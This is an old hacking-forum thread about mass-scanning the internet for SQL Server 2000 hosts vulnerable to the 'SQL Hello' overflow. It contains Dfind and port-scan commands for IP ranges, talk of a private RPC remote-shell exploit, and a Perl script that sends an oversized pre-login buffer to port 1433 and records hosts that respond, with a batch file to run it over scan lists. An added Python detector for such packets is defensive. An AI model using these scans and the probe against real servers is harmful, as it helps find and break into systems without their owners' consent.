SQLScan is a Windows GUI scanner tailored specifically to finding SQL servers that may be vulnerable to the recent SQL "Slammer" or "SQHell" worm that attacks vulnerable Microsoft SQL 2000 servers.
Thanks for the URL, but I don't think this is the right scanner for SQLHello .. I had some results checking by hand .. and then checked it with this scanner and it didn't find my result (shell vuln) .. but thanks anyway
I found this vuln @ Bugtraq ID 53..
and SQL Hello is Bugtraq ID 5411
SkullSplitter
Sep 23 2004, 12:47 AM
if i remember right,
the sqlhello exploit is over 2 years old
why do you want a scanner for this old shit?
isaiah
Sep 23 2004, 01:09 AM
they are probably barely getting the exploit l00l
EzMe
Sep 23 2004, 02:13 AM
Here u go m8
Usage: sqlhelloscanner2 scan.txt yourip > results.txt
Make sure scan.txt is your scan file, and you must enter your ip after scan.txt. The rest explains itself.
ganz2
Sep 23 2004, 04:08 AM
QUOTE (EzMe @ Sep 23 2004, 02:13 AM)
Here u go m8
Usage: sqlhelloscanner2 scan.txt yourip > results.txt
Make sure scan.txt is your scan file, and you must enter your ip after scan.txt. The rest explains itself.
can u specify an ip range in the text file or must you list all ips?
BoNzO
Sep 23 2004, 07:06 AM
scan500 -p 1433 127.0.0.1 127.*.*.1 & good batch script...
MxMx
Sep 23 2004, 07:48 AM
yeah the SQL hello is 2 years old .. but still quite vulnerable
MxMx
Sep 23 2004, 02:02 PM
Help Me !
I type sqlscanner.exe ips.txt myIP
the prog outputs a result.txt after 1 sec
It hasn't scanned my ips
iiiemuiii
Sep 24 2004, 12:04 AM
that's just how fast the scanner works. i scanned about 2000 ips in 5-8 seconds.
also u need to make sure the contents in your file must be just the ips.
MxMx
Sep 24 2004, 05:59 AM
jep ..
I had all ips listed .. no results?..
// the results list stays empty ..
dijk
Sep 24 2004, 06:18 AM
well you don't get many results nowadays so prob.. you don't have a vulnerable one.??
just a option......
ashk1a
Sep 24 2004, 07:32 AM
u can scan range of ips on port 1433 and then make a bat to check this ips if u can get shell or not (u can use sfind scanner)
by the way...any one heard about new rpc exploit??
arn0ld
Sep 24 2004, 08:47 AM
no dude is it prv ?
ashk1a
Sep 24 2004, 10:31 AM
ya its prv and her bug is on lsasrv.dll its new version of rpc exploits and u can get a remote shell on 539 port
ivan288
Sep 24 2004, 12:39 PM
QUOTE (ashk1a @ Sep 24 2004, 10:31 AM)
ya its prv and her bug is on lsasrv.dll its new version of rpc exploits and u can get a remote shell on 539 port
sounds sweet. remember the last rpc one, good times
dfind is very fast scanner scan1000 also use one of them to scan port 1433 than use foundstone@ sql scanner to checks vuln's "read IP's from file" add your port1433 scan file and start scan good luck
MxMx
Oct 3 2004, 06:55 AM
dunnow if foundstone's scanner is made for the sql hello exploit..
thanks for helping me anyway
untouchable
Oct 27 2004, 05:51 PM
there is also Dfind, which is not bad for mssql
Dfind -sql 127.0.0.1 127.0.0.255 255
For example
MxMx
Oct 27 2004, 09:49 PM
owh ofcourse .. dumb me ..
thank y0
kAthArSiS
Oct 31 2004, 04:31 PM
nice. The sql hello vulnerable scanner is really needed !
NoRRiS
Oct 31 2004, 04:57 PM
QUOTE(kAthArSiS @ Oct 31 2004, 04:31 PM)
nice. The sql hello vulnerable scanner is really needed !
Just make a portscan 1433 with a usual portscanner like scan100 500 or 1000
perky
Oct 31 2004, 06:59 PM
ok !
tuttefrut
Nov 2 2004, 12:28 PM
QUOTE
Just make a portscan 1433 with a usual portscanner like scan100 500 or 1000
but then u have to check all ip's for vulnerability. if you have a "sql hello vulnerable scanner" you know which ip's are vuln. and unprotected ... that saves a lot of time when you are working with a large scanfile
Source
Nov 2 2004, 06:12 PM
QUOTE(tuttefrut @ Nov 2 2004, 12:28 PM)
QUOTE
Just make a portscan 1433 with a usual portscanner like scan100 500 or 1000
but then u have to check all ip's for vulnerability. if you have a "sql hello vulnerable scanner" you know which ip's are vuln. and unprotected ... that saves a lot of time when you are working with a large scanfile
True
Or if someone has a batch file that will work with Dfind or something. Something that will check the ip list to see if there are ips vuln to the hello exploit.
any ideas?
NoRRiS
Nov 4 2004, 09:57 PM
QUOTE(tuttefrut @ Nov 2 2004, 12:28 PM)
QUOTE
Just make a portscan 1433 with a usual portscanner like scan100 500 or 1000
but then u have to check all ip's for vulnerability. if you have a "sql hello vulnerable scanner" you know which ip's are vuln. and unprotected ... that saves a lot of time when you are working with a large scanfile
Yes, a real SQLHELLO scanner would be better. But no SQLHELLO scanner exists, or it's private ^^
amnesia
Nov 15 2004, 01:57 AM
QUOTE(iiiemuiii @ Sep 24 2004, 08:04 AM)
that's just how fast the scanner works. i scanned about 2000 ips in 5-8 seconds.
also u need to make sure the contents in your file must be just the ips.
the attached file is missing. can someone attach it back please?
You have to enter your ip, so I think the scanner works with a connect-back exploit to test for vuln. On which port does it connect back? Am I right that the sqlhello source code is still private?
touk
Mar 23 2005, 02:50 PM
CODE
#!/usr/bin/perl # code by touk # for MxMx & GSO # Vulnerable hosts are in vulnerables.txt # This file needs to be named: vcsqlhello.pl
use IO::Socket; use IO::File; use Getopt::Std; getopts('s:', \%args); if(!defined($args{s})) { print "00ps, vcsqlhello.pl -s ipaddress!"; exit; } $serv = $args{s}; $bof="\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b"; #header $bof.="\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02"; #header $bof.="\x10\x00\x00\x00"; #header $bof.="\x00\x24\x01\x00\x00"; #tail
$bof.="crap"x560; # crapmsg $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "(1433)", ) || die("[*] Server Down?\n"); print"[*] Sending VC string\n"; $remote->autoflush(1); print $remote "$bof"; print("[*] All Done...\n"); $remote->recv($answer,4096); if($answer ne '') {
print "[*] Vulnerable"; $resultfile = "vulnerables.txt"; $fh = IO::File->new("+>> $resultfile")or die "Couldn't open $file for writing: $!\n"; open(FH, "+>> $resultfile") or die $!; print FH "$args{s}\n"; close(FH); } else{ print "[*] Not Vulnerable"; exit 1; } sleep(2);
autochecker.bat : FOR /F "tokens=1* delims=," %%i in (scan.txt) do vcsqlhello.pl -s %%i
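Seen from the server side, the message built in the script above declares a 0x34-byte pre-login in its TDS header and then writes 2240 further bytes on the same connection. The following is an added example, not part of the thread or of any tool named in it: a check that a sensor or proxy could run on a captured client pre-login to flag that mismatch and an overlong instance-name option. The function names, the `MAX_INSTANCE_LEN` bound and both sample packets are assumptions constructed for the example.

```python
import struct

TDS_PRELOGIN = 0x12     # TDS packet type of the pre-login ("hello") message
TERMINATOR = 0xFF       # ends the pre-login option table
INSTOPT = 0x02          # instance-name option token
MAX_INSTANCE_LEN = 255  # assumed sanity bound, not a value from the thread

def build_prelogin(instance, trailing=b""):
    """Constructed sample: a well-formed pre-login, optionally followed by extra bytes."""
    values = [(0x00, bytes([8, 0, 2, 16, 0, 0])), (0x01, b"\x00"),
              (INSTOPT, instance), (0x03, b"\x00" * 4)]
    table_len = 5 * len(values) + 1
    table, body = b"", b""
    for token, value in values:
        table += struct.pack(">BHH", token, table_len + len(body), len(value))
        body += value
    payload = table + bytes([TERMINATOR]) + body
    header = struct.pack(">BBHHBB", TDS_PRELOGIN, 0x01, 8 + len(payload), 0, 0, 0)
    return header + payload + trailing

def inspect_prelogin(data):
    """Return the anomalies found in one client-to-server pre-login message."""
    if len(data) < 8 or data[0] != TDS_PRELOGIN:
        return ["not a pre-login packet"]
    findings = []
    declared = struct.unpack(">H", data[2:4])[0]  # includes the 8-byte header
    if len(data) > declared:
        findings.append(f"{len(data) - declared} bytes beyond declared length {declared}")
    payload, pos = data[8:declared], 0
    while True:
        if pos >= len(payload):
            findings.append("option table not terminated")
            break
        if payload[pos] == TERMINATOR:
            break
        if pos + 5 > len(payload):
            findings.append("truncated option entry")
            break
        token, offset, length = struct.unpack(">BHH", payload[pos:pos + 5])
        value = payload[offset:offset + length]
        if offset + length > len(payload):
            findings.append(f"option 0x{token:02x} points outside the payload")
        elif token == INSTOPT and (length > MAX_INSTANCE_LEN or not value.endswith(b"\x00")):
            findings.append("instance name overlong or not NUL-terminated")
        pos += 5
    return findings

if __name__ == "__main__":
    for name, pkt in [("normal", build_prelogin(b"MSSQLServer\x00")),
                      ("padded", build_prelogin(b"MSSQLServer\x00", b"A" * 2240))]:
        print(name, inspect_prelogin(pkt))
```

A well-formed pre-login with a 12-byte instance name comes out at exactly 0x34 bytes, so anything longer than the declared length on port 1433 is worth an alert.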
blumaster
Mar 29 2005, 11:59 AM
i think that for me the best scanner for sql is Xray, but i'm also using Xscan with a modified .dat file where the users and passwords are.